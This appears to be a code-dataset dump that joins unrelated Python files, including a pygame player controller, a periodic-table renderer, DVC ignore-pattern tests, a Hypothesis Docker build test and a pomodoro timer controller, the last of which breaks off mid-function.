CONF_DOCKED_STATUS_VALUE = "docked_status_value"
CONF_BATTERY_DP = "battery_dp"
CONF_MODE_DP = "mode_dp"
CONF_MODES = "modes"
CONF_FAN_SPEED_DP = "fan_speed_dp"
CONF_FAN_SPEEDS = "fan_speeds"
CONF_CLEAN_TIME_DP = "clean_time_dp"
CONF_CLEAN_AREA_DP = "clean_area_dp"
CONF_CLEAN_RECORD_DP = "clean_record_dp"
CONF_LOCATE_DP = "locate_dp"
CONF_FAULT_DP = "fault_dp"
CONF_PAUSED_STATE = "paused_state"
CONF_RETURN_MODE = "return_mode"
CONF_STOP_STATUS = "stop_status"
DATA_DISCOVERY = "discovery"
DOMAIN = "localtuya"
# Platforms in this list must support config flows
PLATFORMS = [
"binary_sensor",
"climate",
"cover",
"fan",
"light",
"number",
"select",
"sensor",
"switch",
"vacuum",
]
TUYA_DEVICE = "tuya_device"
| 2,893 | 1,332 |
import pygame
from settings import *
import utils
class Player(pygame.sprite.Sprite):
def __init__(self, pos, groups, collision_sprites):
super().__init__(groups)
self.image = pygame.Surface((TILE_SIZE / 2, TILE_SIZE))
self.image.fill(PLAYER_COLOR)
self.rect = self.image.get_rect(topleft=pos)
self.collision_sprites = collision_sprites
# Player movement
self.direction_x = 0 # -1 = left, 1 = right, 0 = none
self.velocity = pygame.math.Vector2()
self.speed = MAX_PLAYER_SPEED
# Jumping
self.jumps_remaining = MAX_JUMPS
self.is_grounded = False # Is the player on the ground?
self.was_grounded = False # Used to determine if the player has left the ground this frame
self.is_jumping = False # Is the player jumping?
self.jump_pressed = False # Is the jump key currently pressed?
self.jumping_locked = False # Used to lock the player from jumping again until they release the jump key
self.current_gravity = 0 # The current gravity affecting the player
self.jump_gravity = (2 * MAX_JUMP_HEIGHT) / (TIME_TO_JUMP_APEX ** 2)
self.fall_gravity = self.jump_gravity * FALL_GRAVITY_MULTIPLIER
self.jump_velocity = ((-2 * MAX_JUMP_HEIGHT) / TIME_TO_JUMP_APEX) - self.fall_gravity
# Time
self.coyote_timer = COYOTE_TIME # Time the player has to jump after leaving the ground
self.jump_buffer_timer = JUMP_BUFFER_TIME # Registers jump input as long as this is less than JUMP_BUFFER_TIME
self.last_frame_ticks = 0 # Not used if using estimated delta_time (1/FPS)
def process_input(self, events):
"""Process input events. This method is called by Level, which passes in the events from the main game loop."""
for event in events:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT: # Move left
self.direction_x = -1
if event.key == pygame.K_RIGHT: # Move right
self.direction_x = 1
if event.key == pygame.K_UP: # Jump
self.jump_pressed = True
if event.key == pygame.K_g: # Invert gravity just for fun
self.fall_gravity = -self.fall_gravity
self.current_gravity = -self.current_gravity
if event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT and self.direction_x < 0:
self.direction_x = 0
if event.key == pygame.K_RIGHT and self.direction_x > 0:
self.direction_x = 0
if event.key == pygame.K_UP:
self.jump_pressed = False
self.jumping_locked = False
def check_jump_buffer(self):
"""Conditionally applies jumping force to the player."""
self.update_jump_buffer_timer()
# jump_allowed = not (self.jumps_remaining > 0 and
# (self.is_grounded or self.is_jumping or
# self.coyote_timer < COYOTE_TIME))
jump_input = self.jump_buffer_timer < JUMP_BUFFER_TIME
can_jump = not self.jumping_locked and self.jumps_remaining > 0 and (
self.is_jumping or self.coyote_timer < COYOTE_TIME)
self.jumping_locked = self.jump_pressed
if jump_input and can_jump:
self.jump()
def jump(self):
self.coyote_timer = COYOTE_TIME
self.jump_buffer_timer = JUMP_BUFFER_TIME
self.is_jumping = True
self.jumps_remaining -= 1
self.current_gravity = self.jump_gravity
self.velocity.y = self.jump_velocity
def update_air_timer(self):
"""Resets air timer if grounded, otherwise increments by delta time."""
self.coyote_timer = 0 if self.is_grounded else round(self.coyote_timer + EST_DELTA_TIME, 2)
def update_jump_buffer_timer(self):
"""Resets jump buffer timer if jump key pressed, otherwise increments by delta time."""
self.jump_buffer_timer = 0 if self.jump_pressed and not self.jumping_locked else round(self.jump_buffer_timer + EST_DELTA_TIME, 2)
def move(self):
"""Move the player and apply collisions."""
self.velocity.y += self.current_gravity
self.check_jump_buffer() # Check if the player should jump this frame
target_velocity = pygame.math.Vector2(self.direction_x * self.speed, self.velocity.y)
self.velocity = utils.pygame_vector2_smooth_damp(self.velocity, target_velocity, SMOOTH_TIME, EST_DELTA_TIME)
self.velocity.x = 0 if abs(self.velocity.x) < 2*SMOOTH_TIME else self.velocity.x
# Horizontal movement and collisions
self.rect.x += self.velocity.x
for sprite in self.collision_sprites.sprites():
if not sprite.rect.colliderect(self.rect): continue
# Right collision
elif abs(self.rect.right - sprite.rect.left) < COLLISION_TOLERANCE and self.velocity.x > 0:
self.rect.right = sprite.rect.left
# Left collision
elif abs(self.rect.left - sprite.rect.right) < COLLISION_TOLERANCE and self.velocity.x < 0:
self.rect.left = sprite.rect.right
self.velocity.x = 0
break
# Vertical movement and collisions
# Since vertical movement can be potentially a lot faster than horizontal due to gravity,
# we need to check for collisions as we go each frame, instead of after moving by the velocity.
for i in range(abs(int(self.velocity.y))):
collided = False
self.rect.y += abs(self.velocity.y) / self.velocity.y
for sprite in self.collision_sprites.sprites():
if not sprite.rect.colliderect(self.rect): continue
# Bottom collision
elif abs(self.rect.bottom - sprite.rect.top) < COLLISION_TOLERANCE and self.velocity.y > 0:
self.rect.bottom = sprite.rect.top
# Top collision
elif abs(self.rect.top - sprite.rect.bottom) < COLLISION_TOLERANCE and self.velocity.y < 0:
self.rect.top = sprite.rect.bottom
self.velocity.y = 0
collided = True
break
if collided: break
# Set gravity to fall gravity scale if we're falling or not holding jump
if (not self.is_grounded and (not self.jump_pressed or self.velocity.y > 0)):
self.current_gravity = self.fall_gravity
def set_grounded(self):
"""Moves the player down 1 pixel and checks for a collision."""
self.rect.y += 1
for sprite in self.collision_sprites.sprites():
if sprite.rect.colliderect(self.rect):
if not abs(self.rect.bottom - sprite.rect.top) < COLLISION_TOLERANCE: continue
self.is_grounded = True
self.was_grounded = True
self.is_jumping = False
self.jumps_remaining = MAX_JUMPS
break
else:
self.is_grounded = False
left_ground_this_frame = self.was_grounded and not self.is_grounded
if not left_ground_this_frame: continue
self.air_time_start = pygame.time.get_ticks()
self.was_grounded = False
self.rect.y -= 1
def update(self):
"""Update the player."""
self.update_air_timer()
self.move()
self.set_grounded()
print(f"jumps_remaining: {self.jumps_remaining}")
print(f"jump_locked: {self.jumping_locked}")
# Zombie method, only used if I decide I need perfect delta time (should probably remove this...)
def update_delta_time(self):
"""Update the delta time."""
self.delta_time = (pygame.time.get_ticks() - self.last_frame_ticks) / 1000
self.last_frame_ticks = pygame.time.get_ticks() | 8,098 | 2,458 |
from colored import fg, bg, attr
from . import elements
from . import layouts
class PeriodicTableError(Exception):
"""Periodic Table exceptions."""
pass
class PeriodicTable:
"""Periodic Table."""
def __init__(self, **kwargs):
self.color = kwargs["color"] if "color" in kwargs else False
self.width = kwargs["width"] if "width" in kwargs else None
self.elements = elements.elements
self.layouts = layouts.layouts
def colorize_symbol(self, symbol, show_number=False):
"""Get a pretty version of a symbol or number."""
if symbol == " ":
return " "
symbol = symbol.lower().capitalize()
text = f" {symbol:2} "
if show_number:
number = str(self.elements[symbol]["number"])
text = f" {number:3}"
if self.color:
element_color = self.elements[symbol]["color"]
contrast_color = "white"
if element_color == "yellow":
contrast_color = "yellow_1"
background_color = bg(element_color)
text_color = fg(contrast_color) if show_number else fg("black")
reset = attr("reset")
text = f"{background_color}{text_color}{text}{reset}"
return text
def render_info(self, symbol):
"""Print summary information for a particular element."""
if symbol not in self.elements:
raise PeriodicTableError(f"Symbol not found in the periodic table")
if self.color:
self.render_symbols([symbol])
element = self.elements[symbol]
print(f"Symbol: {symbol}")
print(f"Name: {element['name']}")
if "origin" in element:
print(f"Origin of name: {element['origin']}")
print(f"Series: {element['series'].capitalize()}")
print(f"Atomic number: {element['number']}")
print(f"Period: {element['period']}")
if "group" in element:
print(f"Group: {element['group']}")
def render_table(self, layout="standard", show_grid=False):
"""Print the classic periodic table using current output
configuration."""
if layout not in self.layouts:
raise PeriodicTableError(f"Unknown table layout '{layout}'")
if show_grid:
print(" " + self.layouts[layout]["grid"])
print()
period = 1
for line in self.layouts[layout]["table"].splitlines():
line = f" {line} "
is_top_line = period == int(period)
period += 0.5
for symbol in self.elements:
replacement = self.colorize_symbol(symbol, is_top_line)
line = line.replace(f" {symbol:2} ", replacement)
if show_grid:
header = int(period) if period < 8 and is_top_line else ' '
line = f"{header} {line}"
if self.color:
reset = attr('reset')
for symbol in self.elements:
color = bg(self.elements[symbol]["color"])
pattern = f" {symbol:2} "
line = line.replace(pattern, f"{color}{pattern}{reset}")
print(line)
def render_symbols(self, symbols):
"""Print a list of symbols using current output configuration."""
columns = int(self.width / 4)
lines = [symbols[i:i + columns] for i in range(0, len(symbols), columns)]
for line in lines:
top = [self.colorize_symbol(symbol, show_number=True) for symbol in line]
bottom = [self.colorize_symbol(symbol) for symbol in line]
print("".join(top))
print("".join(bottom))
def get_solutions(self, word, recursing=False):
"""Find all permutations that can spell a word."""
if not recursing:
self.stack = []
self.results = []
word = word.lower()
for symbol in self.elements:
symbol = symbol.lower()
if symbol == word:
if self.stack not in self.results:
self.stack.append(symbol)
self.results.append(self.stack)
self.stack = self.stack[:-1]
continue
if symbol == word[:len(symbol)]:
self.stack.append(symbol)
self.get_solutions(word[len(symbol):], recursing=True)
self.stack = self.stack[:-1]
return sorted(self.results, key=self.get_solution_ranking)
def get_solution_ranking(self, solution):
"""Score a solution based on length and number of repeated symbols."""
return len(solution) + 100 * (len(solution) - len(set(solution)))
def get_symbol_from_atomic_number(self, number):
"""Translate an atomic number into an element's symbol."""
number = int(number)
elements = self.elements
matches = [e for e in elements if elements[e]["number"] == number]
return matches[0] if matches else None
| 5,054 | 1,406 |
from datetime import date
from enum import IntEnum
class TransactionDirection(IntEnum):
EXPENSES = 0
INCOME = 1
class Transaction:
def __init__(self):
self.will_import = True
self.transaction_date = date.today()
self.payee = ''
self.description = ''
self.amount = 0
self.currency = ''
self.bill_payment_account = ''
self.direction = TransactionDirection.EXPENSES
self.from_account = ''
self.to_account = ''
self.is_modified = False
| 536 | 162 |
'''
This file is part of PM4Py (More Info: https://pm4py.fit.fraunhofer.de).
PM4Py is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PM4Py is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with PM4Py. If not, see <https://www.gnu.org/licenses/>.
'''
from enum import Enum
from pm4py.algo.discovery.dfg.adapters.pandas.df_statistics import get_concurrent_events_dataframe
from pm4py.util import exec_utils, constants, xes_constants
from typing import Optional, Dict, Any, Union, Tuple, List, Set
import pandas as pd
class Parameters(Enum):
ACTIVITY_KEY = constants.PARAMETER_CONSTANT_ACTIVITY_KEY
CASE_ID_KEY = constants.PARAMETER_CONSTANT_CASEID_KEY
TIMESTAMP_KEY = constants.PARAMETER_CONSTANT_TIMESTAMP_KEY
START_TIMESTAMP_KEY = constants.PARAMETER_CONSTANT_START_TIMESTAMP_KEY
STRICT = "strict"
def apply(dataframe: pd.DataFrame, parameters: Optional[Dict[Union[str, Parameters], Any]] = None) -> Dict[Tuple[str, str], int]:
"""
Gets the number of times for which two activities have been concurrent in the log
Parameters
--------------
dataframe
Pandas dataframe
parameters
Parameters of the algorithm, including:
- Parameters.ACTIVITY_KEY => activity key
- Parameters.CASE_ID_KEY => case id
- Parameters.START_TIMESTAMP_KEY => start timestamp
- Parameters.TIMESTAMP_KEY => complete timestamp
- Parameters.STRICT => Determine if only entries that are strictly concurrent
(i.e. the length of the intersection as real interval is > 0) should be obtained. Default: False
Returns
--------------
ret_dict
Dictionaries associating to a couple of activities (tuple) the number of times for which they have been
executed in parallel in the log
"""
if parameters is None:
parameters = {}
activity_key = exec_utils.get_param_value(Parameters.ACTIVITY_KEY, parameters, xes_constants.DEFAULT_NAME_KEY)
case_id_glue = exec_utils.get_param_value(Parameters.CASE_ID_KEY, parameters, constants.CASE_CONCEPT_NAME)
timestamp_key = exec_utils.get_param_value(Parameters.TIMESTAMP_KEY, parameters,
xes_constants.DEFAULT_TIMESTAMP_KEY)
start_timestamp_key = exec_utils.get_param_value(Parameters.START_TIMESTAMP_KEY, parameters, None)
strict = exec_utils.get_param_value(Parameters.STRICT, parameters, False)
concurrent_dataframe = get_concurrent_events_dataframe(dataframe, start_timestamp_key=start_timestamp_key,
timestamp_key=timestamp_key, case_id_glue=case_id_glue,
activity_key=activity_key, strict=strict)
ret_dict0 = concurrent_dataframe.groupby([activity_key, activity_key + '_2']).size().to_dict()
ret_dict = {}
# assure to avoid problems with np.float64, by using the Python float type
for el in ret_dict0:
# avoid getting two entries for the same set of concurrent activities
el2 = tuple(sorted(el))
ret_dict[el2] = int(ret_dict0[el])
return ret_dict
| 3,617 | 1,060 |
import os
import argparse
import yaml
import pprint
from easydict import EasyDict as edict
from download import download
from read_process import read_process
from de_analysis import de
from cancer import cancer
def parse_args():
parser = argparse.ArgumentParser(description='eCLIP')
parser.add_argument('--config', dest='config_file',
help='configuration filename',
default='configs.yml', type=str)
return parser.parse_args()
def load_config(config_path):
with open(config_path, 'r') as f:
config = edict(yaml.load(f))
return config
def main():
print('ECLIP data processing pipeline.')
## load config file
args = parse_args()
if args.config_file is None:
raise Exception('no configuration file')
config = load_config(args.config_file)
pprint.PrettyPrinter(indent=2).pprint(config)
## download data
download(config)
## reads processing
read_process(config)
## differential expression analysis
de(config)
## cancer
cancer(config)
if __name__ == '__main__':
main()
| 1,120 | 324 |
"""Module for custom Scrapy request components."""
from scrapy import Request
class SeleniumCallbackRequest(Request):
"""Process request with given callback using Selenium.
Args:
selenium_callback (func or None, optional): Function that will be
called with the chrome webdriver. The function should take in
parameters (request, spider, driver) and return request, response
or None. If None, driver will be used for fetching the page, and
return is response. Defaults to None.
"""
def __init__(self, *args, selenium_callback=None, **kwargs):
meta = kwargs.pop('meta', {}) or {}
if 'selenium_callback' not in meta:
meta['selenium_callback'] = selenium_callback
new_kwargs = dict(**kwargs, meta=meta)
super(SeleniumCallbackRequest, self).__init__(*args, **new_kwargs)
| 887 | 226 |
import os
import shutil
import pytest
from dvc.exceptions import DvcIgnoreInCollectedDirError
from dvc.ignore import (
DvcIgnore,
DvcIgnoreDirs,
DvcIgnorePatterns,
DvcIgnorePatternsTrie,
DvcIgnoreRepo,
)
from dvc.path_info import PathInfo
from dvc.repo import Repo
from dvc.tree.local import LocalRemoteTree
from dvc.utils import relpath
from dvc.utils.fs import get_mtime_and_size
from tests.dir_helpers import TmpDir
def test_ignore(tmp_dir, dvc, monkeypatch):
tmp_dir.gen({"dir": {"ignored": "text", "other": "text2"}})
tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/ignored")
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"}
def test_ignore_unicode(tmp_dir, dvc):
tmp_dir.gen({"dir": {"other": "text", "тест": "проверка"}})
tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/тест")
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"}
def test_rename_ignored_file(tmp_dir, dvc):
tmp_dir.gen({"dir": {"ignored": "...", "other": "text"}})
tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "ignored*")
dvc.tree.__dict__.pop("dvcignore", None)
mtime, size = get_mtime_and_size("dir", dvc.tree)
shutil.move("dir/ignored", "dir/ignored_new")
new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)
assert new_mtime == mtime and new_size == size
def test_rename_file(tmp_dir, dvc):
tmp_dir.gen({"dir": {"foo": "foo", "bar": "bar"}})
mtime, size = get_mtime_and_size("dir", dvc.tree)
shutil.move("dir/foo", "dir/foo_new")
new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)
assert new_mtime != mtime and new_size == size
def test_remove_ignored_file(tmp_dir, dvc):
tmp_dir.gen({"dir": {"ignored": "...", "other": "text"}})
tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/ignored")
dvc.tree.__dict__.pop("dvcignore", None)
mtime, size = get_mtime_and_size("dir", dvc.tree)
os.remove("dir/ignored")
new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)
assert new_mtime == mtime and new_size == size
def test_remove_file(tmp_dir, dvc):
tmp_dir.gen({"dir": {"foo": "foo", "bar": "bar"}})
mtime, size = get_mtime_and_size("dir", dvc.tree)
os.remove("dir/foo")
new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)
assert new_mtime != mtime and new_size != size
def test_dvcignore_in_out_dir(tmp_dir, dvc):
tmp_dir.gen({"dir": {"foo": "foo", DvcIgnore.DVCIGNORE_FILE: ""}})
with pytest.raises(DvcIgnoreInCollectedDirError):
dvc.add("dir")
@pytest.mark.parametrize("dname", ["dir", "dir/subdir"])
def test_ignore_collecting_dvcignores(tmp_dir, dvc, dname):
tmp_dir.gen({"dir": {"subdir": {}}})
top_ignore_file = (tmp_dir / dname).with_name(DvcIgnore.DVCIGNORE_FILE)
top_ignore_file.write_text(os.path.basename(dname))
dvc.tree.__dict__.pop("dvcignore", None)
ignore_file = tmp_dir / dname / DvcIgnore.DVCIGNORE_FILE
ignore_file.write_text("foo")
assert len(dvc.tree.dvcignore.ignores) == 3
assert DvcIgnoreDirs([".git", ".hg", ".dvc"]) in dvc.tree.dvcignore.ignores
ignore_pattern_trie = None
for ignore in dvc.tree.dvcignore.ignores:
if isinstance(ignore, DvcIgnorePatternsTrie):
ignore_pattern_trie = ignore
assert ignore_pattern_trie is not None
assert (
DvcIgnorePatterns.from_files(
os.fspath(top_ignore_file),
LocalRemoteTree(None, {"url": dvc.root_dir}),
)
== ignore_pattern_trie[os.fspath(ignore_file)]
)
assert any(
i for i in dvc.tree.dvcignore.ignores if isinstance(i, DvcIgnoreRepo)
)
def test_ignore_on_branch(tmp_dir, scm, dvc):
tmp_dir.scm_gen({"foo": "foo", "bar": "bar"}, commit="add files")
with tmp_dir.branch("branch", new=True):
tmp_dir.scm_gen(DvcIgnore.DVCIGNORE_FILE, "foo", commit="add ignore")
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path)) == {
path / "foo",
path / "bar",
}
dvc.tree = scm.get_tree("branch", use_dvcignore=True)
assert set(dvc.tree.walk_files(path)) == {
os.fspath(path / DvcIgnore.DVCIGNORE_FILE),
os.fspath(path / "bar"),
}
def test_match_nested(tmp_dir, dvc):
tmp_dir.gen(
{
".dvcignore": "*.backup\ntmp",
"foo": "foo",
"tmp": "...",
"dir": {"x.backup": "x backup", "tmp": "content"},
}
)
dvc.tree.__dict__.pop("dvcignore", None)
result = {os.fspath(os.path.normpath(f)) for f in dvc.tree.walk_files(".")}
assert result == {".dvcignore", "foo"}
def test_ignore_external(tmp_dir, scm, dvc, tmp_path_factory):
tmp_dir.gen(".dvcignore", "*.backup\ntmp")
ext_dir = TmpDir(os.fspath(tmp_path_factory.mktemp("external_dir")))
ext_dir.gen({"y.backup": "y", "tmp": "ext tmp"})
result = {relpath(f, ext_dir) for f in dvc.tree.walk_files(ext_dir)}
assert result == {"y.backup", "tmp"}
def test_ignore_subrepo(tmp_dir, scm, dvc):
tmp_dir.gen({".dvcignore": "foo", "subdir": {"foo": "foo"}})
scm.add([".dvcignore"])
scm.commit("init parent dvcignore")
dvc.tree.__dict__.pop("dvcignore", None)
subrepo_dir = tmp_dir / "subdir"
assert not dvc.tree.exists(PathInfo(subrepo_dir / "foo"))
with subrepo_dir.chdir():
subrepo = Repo.init(subdir=True)
scm.add(str(subrepo_dir / "foo"))
scm.commit("subrepo init")
for _ in subrepo.brancher(all_commits=True):
assert subrepo.tree.exists(PathInfo(subrepo_dir / "foo"))
def test_ignore_blank_line(tmp_dir, dvc):
tmp_dir.gen({"dir": {"ignored": "text", "other": "text2"}})
tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "foo\n\ndir/ignored")
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"}
# It is not possible to re-include a file if a parent directory of
# that file is excluded.
# Git doesn’t list excluded directories for performance reasons,
# so any patterns on contained files have no effect,
# no matter where they are defined.
@pytest.mark.parametrize(
"data_struct, pattern_list, result_set",
[
(
{"dir": {"subdir": {"not_ignore": "121"}}},
["subdir/*", "!not_ignore"],
{os.path.join("dir", "subdir", "not_ignore")},
),
(
{"dir": {"subdir": {"should_ignore": "121"}}},
["subdir", "!should_ignore"],
set(),
),
(
{"dir": {"subdir": {"should_ignore": "121"}}},
["subdir/", "!should_ignore"],
set(),
),
],
)
def test_ignore_file_in_parent_path(
tmp_dir, dvc, data_struct, pattern_list, result_set
):
tmp_dir.gen(data_struct)
tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "\n".join(pattern_list))
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path / "dir")) == {
path / relpath for relpath in result_set
}
# If there is a separator at the end of the pattern then the pattern
# will only match directories,
# otherwise the pattern can match both files and directories.
# For example, a pattern doc/frotz/ matches doc/frotz directory,
# but not a/doc/frotz directory;
def test_ignore_sub_directory(tmp_dir, dvc):
tmp_dir.gen(
{
"dir": {
"doc": {"fortz": {"b": "b"}},
"a": {"doc": {"fortz": {"a": "a"}}},
}
}
)
tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "doc/fortz"}})
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path / "dir")) == {
path / "dir" / "a" / "doc" / "fortz" / "a",
path / "dir" / DvcIgnore.DVCIGNORE_FILE,
}
# however frotz/ matches frotz and a/frotz that is a directory
def test_ignore_directory(tmp_dir, dvc):
tmp_dir.gen({"dir": {"fortz": {}, "a": {"fortz": {}}}})
tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "fortz"}})
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path / "dir")) == {
path / "dir" / DvcIgnore.DVCIGNORE_FILE,
}
def test_multi_ignore_file(tmp_dir, dvc, monkeypatch):
tmp_dir.gen({"dir": {"subdir": {"should_ignore": "1", "not_ignore": "1"}}})
tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/subdir/*_ignore")
tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "!subdir/not_ignore"}})
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path / "dir")) == {
path / "dir" / "subdir" / "not_ignore",
path / "dir" / DvcIgnore.DVCIGNORE_FILE,
}
def test_pattern_trie_tree(tmp_dir, dvc):
tmp_dir.gen(
{
"top": {
"first": {
DvcIgnore.DVCIGNORE_FILE: "a\nb\nc",
"middle": {
"second": {
DvcIgnore.DVCIGNORE_FILE: "d\ne\nf",
"bottom": {},
}
},
},
},
"other": {DvcIgnore.DVCIGNORE_FILE: "1\n2\n3"},
}
)
dvc.tree.__dict__.pop("dvcignore", None)
ignore_pattern_trie = None
for ignore in dvc.tree.dvcignore.ignores:
if isinstance(ignore, DvcIgnorePatternsTrie):
ignore_pattern_trie = ignore
break
assert ignore_pattern_trie is not None
ignore_pattern_top = ignore_pattern_trie[os.fspath(tmp_dir / "top")]
ignore_pattern_other = ignore_pattern_trie[os.fspath(tmp_dir / "other")]
ignore_pattern_first = ignore_pattern_trie[
os.fspath(tmp_dir / "top" / "first")
]
ignore_pattern_middle = ignore_pattern_trie[
os.fspath(tmp_dir / "top" / "first" / "middle")
]
ignore_pattern_second = ignore_pattern_trie[
os.fspath(tmp_dir / "top" / "first" / "middle" / "second")
]
ignore_pattern_bottom = ignore_pattern_trie[
os.fspath(tmp_dir / "top" / "first" / "middle" / "second" / "bottom")
]
assert not ignore_pattern_top
assert (
DvcIgnorePatterns([], os.fspath(tmp_dir / "top")) == ignore_pattern_top
)
assert (
DvcIgnorePatterns(["1", "2", "3"], os.fspath(tmp_dir / "other"))
== ignore_pattern_other
)
assert (
DvcIgnorePatterns(
["a", "b", "c"], os.fspath(tmp_dir / "top" / "first")
)
== ignore_pattern_first
)
assert (
DvcIgnorePatterns(
["a", "b", "c"], os.fspath(tmp_dir / "top" / "first")
)
== ignore_pattern_middle
)
assert (
DvcIgnorePatterns(
[
"a",
"b",
"c",
"/middle/second/**/d",
"/middle/second/**/e",
"/middle/second/**/f",
],
os.fspath(tmp_dir / "top" / "first"),
)
== ignore_pattern_second
)
assert (
DvcIgnorePatterns(
[
"a",
"b",
"c",
"/middle/second/**/d",
"/middle/second/**/e",
"/middle/second/**/f",
],
os.fspath(tmp_dir / "top" / "first"),
)
== ignore_pattern_bottom
)
def test_ignore_in_added_dir(tmp_dir, dvc):
tmp_dir.gen(
{
"dir": {
"sub": {
"ignored": {"content": "ignored content"},
"not_ignored": "not ignored content",
}
},
".dvcignore": "**/ignored",
}
)
dvc.tree.__dict__.pop("dvcignore", None)
ignored_path = tmp_dir / "dir" / "sub" / "ignored"
assert not dvc.tree.exists(PathInfo(ignored_path))
assert ignored_path.exists()
dvc.add("dir")
shutil.rmtree(ignored_path)
dvc.checkout()
assert not ignored_path.exists()
| 12,254 | 4,497 |
from subprocess import call
from tempfile import NamedTemporaryFile
from hypothesis import settings, note
from hypothesis.stateful import RuleBasedStateMachine, rule
from hypothesis.strategies import sampled_from
def versions():
""" generates only minor versions available on Docker Hub """
# TODO: treat as sem-ver version to allow accurate ordering (exercise left to the reader)
return sampled_from(['3.5', '3.6', '3.7', '3.8'])
class TestPythonVersions(RuleBasedStateMachine):
@rule(version=versions())
def try_build_image(self, version):
with NamedTemporaryFile() as tmp:
print(f"building in Python version {version} ({tmp.name})")
contents = f"""FROM python:{version}-alpine
COPY demoapp.py .
RUN python demoapp.py
"""
tmp.write(contents.encode())
tmp.flush()
note(f'Program does not run on Python {version}')
exit_code = call(f'docker build -f {tmp.name} .'.split(' '))
assert exit_code == 0
TestPythonVersions.TestCase.settings = settings(deadline=None)
test_python_versions = TestPythonVersions.TestCase
| 1,128 | 328 |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest import mock
import uploader
class UploaderTest(unittest.TestCase):
def setUp(self):
super().setUp()
self.mock_client = mock.MagicMock()
self.mock_bundle = mock.MagicMock()
self._upload_resource = mock.patch.object(
uploader.Uploader, '_upload_resource', return_value='123').start()
def test_upload_bundle(self):
self.mock_bundle.openmrs_patient = mock.MagicMock()
upload_handler = uploader.Uploader(self.mock_client)
upload_handler.upload_openmrs_bundle(self.mock_bundle)
self.assertTrue(self._upload_resource.called)
self.assertEqual(self.mock_bundle.openmrs_patient.base.new_id, '123')
def test_upload_bundle_gcp(self):
self.mock_bundle.patient = None
upload_handler = uploader.Uploader(self.mock_client)
upload_handler.upload_bundle(self.mock_bundle)
self.assertFalse(self._upload_resource.called)
| 1,479 | 472 |
from __future__ import annotations
from enum import Enum
from typing import List
import os.path as path
import stargazing.data.database as database
import stargazing.audio.audio_controller as audio_ac
import stargazing.audio.audio_player as audio_ap
import stargazing.pomodoro.timer as pomo_t
import stargazing.project.project_controller as proj_pc
from stargazing.utils.format_funcs import format_pomodoro_time
ALARM_START_PATH = f"{path.dirname(path.abspath(__file__))}/../res/alarm_start.mp3"
ALARM_FINISH_PATH = f"{path.dirname(path.abspath(__file__))}/../res/alarm_finish.mp3"
class PomodoroIntervalSettings():
"""Interval settings for the pomodoro timer.
@param work_secs: Number of seconds for the work interval of the timer.
@param break_secs: Number of seconds for the break interval of the timer."""
def __init__(self, work_secs: int, break_secs: int) -> None:
self.work_secs = work_secs
self.break_secs = break_secs
@property
def name(self) -> str:
return f"{format_pomodoro_time(self.work_secs, False)} + {format_pomodoro_time(self.break_secs, False)}"
def __eq__(self, o: PomodoroIntervalSettings) -> bool:
return self.work_secs == o.work_secs and self.break_secs == o.break_secs
def __ne__(self, o: PomodoroIntervalSettings) -> bool:
return not self.__eq__(o)
class PomodoroStatus(Enum):
INACTIVE = "inactive"
WORK = "work"
BREAK = "break"
PAUSED_WORK = "paused work"
PAUSED_BREAK = "paused break"
FINISHED_WORK = "finished work"
FINISHED_BREAK = "finished break"
class PomodoroController():
"""Pomodoro manager, containing current pomodoro timer, status, autostart option and interval settings.
@param project_controller: Instance of a project controller.
@param audio_controller: Instance of an audio controller."""
def __init__(self, project_controller: proj_pc.ProjectController, audio_controller: audio_ac.AudioController,
interval_time: PomodoroIntervalSettings = None, last_autostart=True) -> None:
self.project_controller = project_controller
self.audio_controller = audio_controller
self.interval_settings = interval_time if interval_time else PomodoroIntervalSettings(
2400, 600)
self.autostart_setting = last_autostart
self.timer = pomo_t.Timer(self.interval_settings.work_secs)
self.status = PomodoroStatus.INACTIVE
def finish_timer(self, disable_sound=False) -> None:
if self.status in (PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK):
database.insert_pomodoro(
